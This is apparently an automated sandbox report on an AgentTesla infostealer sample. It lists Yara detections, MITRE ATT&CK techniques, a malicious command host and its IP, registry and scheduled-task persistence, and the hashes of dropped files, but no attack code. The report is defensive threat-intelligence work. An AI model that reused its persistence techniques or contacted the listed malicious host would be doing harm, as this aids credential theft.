Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 31.2.svchost.exe.191113c5518.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f24404c2a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.1705204e0d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.1911138aad0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.214522b6dd8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.1911138aad0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f244086ce8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.2145227c390.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.svchost.exe.191113c5518.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.17052088b18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.17052088b18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.1f24404c2a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.2145227c390.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.214522b6dd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.svchost.exe.1705204e0d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2525046983.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3407099977.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2525046983.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2525046983.0000000002B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3406933731.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3407099977.0000000002D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3409529944.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3409529944.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3409529944.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3407099977.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3406933731.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	211 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Obfuscated Files or Information	1 Credentials in Registry	241 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	161 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	161 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002A_29.exe	100%	Avira	TR/AD.Nekark.jlfug
LisectAVT_2403002A_29.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\svchost.exe	100%	Avira	TR/AD.Nekark.jlfug
C:\Users\user\AppData\Roaming\svchost.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/Prod1C:	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV21C:	0%	Avira URL Cloud	safe
http://cp8nl.hyperhost.ua	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
cp8nl.hyperhost.ua	185.174.175.187	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006400000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3454826788.0000000006449000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3405626312.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000002.00000003.2203217669.00000298F0BE0000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000002.00000002.3405457623.00000298F0EAE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.19.dr	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/Prod1C:	qmgr.db.2.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006400000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3454826788.0000000006449000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3405626312.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	svchost.exe, 00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006400000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3454826788.0000000006449000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3405626312.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LisectAVT_2403002A_29.exe, 00000001.00000002.2287115517.0000021D909E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cp8nl.hyperhost.ua	RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.174.175.187	cp8nl.hyperhost.ua	Ukraine		21100	ITLDC-NLUA	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482367
Start date and time:	2024-07-25 21:52:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002A_29.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@62/33@1/2
EGA Information:	Successful, ratio: 77.8%
HCA Information:	Successful, ratio: 70% Number of executed functions: 276 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.115.3.253, 184.28.90.27, 13.85.23.86, 192.229.221.95, 40.126.32.76, 40.126.32.133, 20.190.160.14, 40.126.32.74, 20.190.160.17, 40.126.32.136, 40.126.32.134, 40.126.32.138, 52.165.164.15, 20.189.173.22, 13.85.23.206, 199.232.214.172, 20.166.126.56, 20.242.39.171, 104.208.16.94, 131.107.255.255, 199.232.210.172
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target RegAsm.exe, PID 2016 because it is empty
Execution Graph export aborted for target jsc.exe, PID 572 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: LisectAVT_2403002A_29.exe

Simulations

Behavior and APIs

Time	Type	Description
15:53:52	API Interceptor	2x Sleep call for process: svchost.exe modified
15:54:06	API Interceptor	31x Sleep call for process: jsc.exe modified
15:54:08	API Interceptor	53x Sleep call for process: RegAsm.exe modified
15:54:10	API Interceptor	4x Sleep call for process: WerFault.exe modified
15:54:16	API Interceptor	37x Sleep call for process: MSBuild.exe modified
21:54:02	Task Scheduler	Run new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
21:54:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
21:54:12	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
185.174.175.187	T#U00dcB#U0130TAK SAGE TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 _xlsx.exe	Get hash	malicious	AgentTesla	Browse
	ORDER CETECpdf.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Trojan-Downloader.Autoit.gen.16556.5123.exe	Get hash	malicious	AgentTesla	Browse
	T#U00dcB#U0130TAK SAGE F#U0130YAT TEKL#U0130F#U0130 #U0130STE#U011e#U0130 20243054_xlsx.exe	Get hash	malicious	AgentTesla	Browse
	nick.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	rT__B__TAKSAGET.exe	Get hash	malicious	AgentTesla	Browse
	T#U00dcB#U0130TAK SAGE TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 _xlsx.exe	Get hash	malicious	AgentTesla	Browse
	wealt.scr.exe	Get hash	malicious	AgentTesla	Browse
	rGH5387F8WY-EC738378380-DJK783783928278.exe	Get hash	malicious	AgentTesla	Browse
	DG892378389-CFT8338ED893-QPYUR7383728.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	http://www.artisteer.com/?p=affr&redirect_url=https://tdg.site4clientdemo.com/vendor/bin/hereme/43432/6467r/biddept@lakeshorelearning.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://exchange.adsbymediavine.com/usersync/sync	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://forms.office.com/r/2sQKUFgdzE	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://cutt.ly/98486848789-form-sharepolnt-PROJECTJULY2024-pdf	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	192.229.221.95
	https://url.us.m.mimecastprotect.com/s/E8trC5yxE7iZK9MZ8-vl	Get hash	malicious	Unknown	Browse	192.229.221.95
	IAENMAIL-A4-240717-0830-000090912_PDF.exe	Get hash	malicious	Remcos	Browse	192.229.221.95
	https://we.tl/t-RErWU1YgQS	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://link.edgepilot.com/s/ffd2b499/yDWVkbNI4U2Q4sOU_SttcQ?u=https://app.smartdraw.com/share.aspx/?pubDocShare=ADCD2AD01498233B06F10716AAA07D9C1E6	Get hash	malicious	Unknown	Browse	192.229.221.95
	LisectAVT_2403002A_51.exe	Get hash	malicious	Stealerium	Browse	192.229.221.95
	http://docusign.net	Get hash	malicious	Unknown	Browse	192.229.221.95
bg.microsoft.map.fastly.net	LisectAVT_2403002A_362.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://pousadaalgodaodapraia.com.br/wp-includes/Kinsh.html	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://url.us.m.mimecastprotect.com/s/E8trC5yxE7iZK9MZ8-vl	Get hash	malicious	Unknown	Browse	199.232.214.172
	LisectAVT_2403002A_425.dll	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://littlebighero.ch	Get hash	malicious	Unknown	Browse	199.232.210.172
	LisectAVT_2403002A_482.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	199.232.210.172
	https://we.tl/t-RErWU1YgQS	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://link.edgepilot.com/s/ffd2b499/yDWVkbNI4U2Q4sOU_SttcQ?u=https://app.smartdraw.com/share.aspx/?pubDocShare=ADCD2AD01498233B06F10716AAA07D9C1E6	Get hash	malicious	Unknown	Browse	199.232.214.172
	LisectAVT_2403002A_495.dll.dll	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://docusign.net	Get hash	malicious	Unknown	Browse	199.232.214.172
cp8nl.hyperhost.ua	T#U00dcB#U0130TAK SAGE TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 _xlsx.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	ORDER CETECpdf.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	185.174.175.187
	SecuriteInfo.com.Trojan-Downloader.Autoit.gen.16556.5123.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	T#U00dcB#U0130TAK SAGE F#U0130YAT TEKL#U0130F#U0130 #U0130STE#U011e#U0130 20243054_xlsx.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	nick.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.174.175.187
	rT__B__TAKSAGET.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	T#U00dcB#U0130TAK SAGE TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 _xlsx.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	wealt.scr.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	rGH5387F8WY-EC738378380-DJK783783928278.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	DG892378389-CFT8338ED893-QPYUR7383728.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ITLDC-NLUA	T#U00dcB#U0130TAK SAGE TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 _xlsx.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	ORDER CETECpdf.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	185.174.175.187
	setup.exe	Get hash	malicious	RedLine	Browse	185.154.14.30
	SecuriteInfo.com.Trojan-Downloader.Autoit.gen.16556.5123.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	T#U00dcB#U0130TAK SAGE F#U0130YAT TEKL#U0130F#U0130 #U0130STE#U011e#U0130 20243054_xlsx.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	nick.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.174.175.187
	rT__B__TAKSAGET.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	T#U00dcB#U0130TAK SAGE TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 _xlsx.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	wealt.scr.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187
	rGH5387F8WY-EC738378380-DJK783783928278.exe	Get hash	malicious	AgentTesla	Browse	185.174.175.187

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7263094109180381
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH06:9JZj5MiKNnNhoxuH
MD5:	71B81B7BB07D067955763E53AC1BB36A
SHA1:	C4E6351D58D9CA155C919BECE95C9838494C2351
SHA-256:	6B2A05CCFADB5E89D06176E5605D3BB25AAC3A7D835549EEF39E672C84651E71
SHA-512:	3701F5DB1D89A7A2E301FF771B54A7BA6797E3B6B9F32FD9C6C37E4EB09D12E87926A40FC9E34206412AF9A9A115587863B34A46B9202ADF8CEB54A669CAEADB
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xae2b4804, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7555786990056936
Encrypted:	false
SSDEEP:	1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL
MD5:	C40C45F34F1981FACC793D428910AC6A
SHA1:	3686DC0D51B510FA9F6CA107A9F48EA00353006A
SHA-256:	B608BF3EEADE80FDCAA3A1CA81B37E92ADAC4F774239CC44856DF99C84C1C041
SHA-512:	067211F9F0AD7FB5B889BF1C8A9A46C5EED41398D7EB9742D46CF5BC73E451E96E75297DE9EE5DFB840394041B8E3F072843F5557CE8AA1DC5BC9795ECE288EE
Malicious:	false
Preview:	.+H.... .......7.......X\...;...{......................0.e......!...{?.45...\|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.....................................45...\|).................ee,.45...\|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07991704568949429
Encrypted:	false
SSDEEP:	3:u2BW/EYemAR0efNaAPaU1ldJRA6k/talluxmO+l/SNxOf:umW8zbR0ENDPaUTReQgmOH
MD5:	9C71A20BADAFC022A1D455251CB6087A
SHA1:	E85102BB8015C0F6A129B2B6BC7E6858317639ED
SHA-256:	12F012EF15D59CD4F46C13FD40A37C67DB86161B43F3A4FBCCEA74077AE29474
SHA-512:	E653B918836A5B8E3EE364F21CA71B2CFCB6587E44B96B29BBEF185854308C6E25CA7F48A4BAFE5A68C2C8579649BC2761D7C71C9F2B17F2E0E4405B9645FC93
Malicious:	false
Preview:	..S$.....................................;...{..45...\|...!...{?..........!...{?..!...{?..g...!...{?.................ee,.45...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_dae5beae797db3ecbb8fa0e3475fee7a94437a_7c70d214_3cc1fd1a-b0cd-4737-9eb1-8abc11b81acf\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.131691076223639
Encrypted:	false
SSDEEP:	192:2QAb6bh0uvduIay5eFlJsfZFsB5TzuiFZZ24lO8Mt:vAbWiuvdtaKUZ5TzuiFZY4lO8M
MD5:	B458DAADE7FE79E7BD89BAD50EFAAD5B
SHA1:	D56243EB44A803524ACA1BA93180F679282A4B58
SHA-256:	0C7D99CF811258165B6AC99DF5351791B5613BF23D4E9F93164BEEC61BF678F8
SHA-512:	638FC34447C49FAA08524C728BA065768ECA63BC9969D85A215BACBA6DB5327B73BE06A5028392234B5EE6531A7C9EAFD0F82DC4CF90313E29359AA8AB6E02A6
Malicious:	false
